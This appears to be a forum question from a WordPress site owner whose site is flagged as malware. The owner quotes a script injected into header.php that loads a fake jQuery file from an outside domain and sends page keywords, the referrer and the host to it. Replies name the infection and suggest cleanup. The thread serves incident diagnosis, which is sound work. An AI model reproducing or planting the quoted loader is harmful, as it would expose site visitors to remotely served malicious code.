# Wordpress site keeps getting flagged as malware

Tags: plugins, jquery

I have a Wordpress site that is constantly getting flagged as Malware by Google:

https://www.google.com/transparencyreport/safebrowsing/diagnostic/#url=damonanddoras.com

[image]

It is this line in my `header.php` file:

```
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://thatching.co.za/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://thatching.co.za/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
```

Every time I delete the line, or replace the foreign URL with a jQuery CDN URL, the file gets edited and a different URL is updated.

Any ideas?

Comment: You probably want https://codex.wordpress.org/FAQ_My_site_was_hacked - you'll have to either track down what's doing that or rebuild your system from known-good backups, saving as much else as you can.

Comment: Most probably this one: https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

Comment: i'd advise installing wordfence and scanning your site.

Answer (score 1, accepted):

Your site has been infected with fake jquery. [Check the Sucuri scan](https://sitecheck.sucuri.net/results/damonanddoras.com) (i have no affiliation with this company). The root infection may be in your 404 template, but if you don't know where to start you're better of seeking professional support.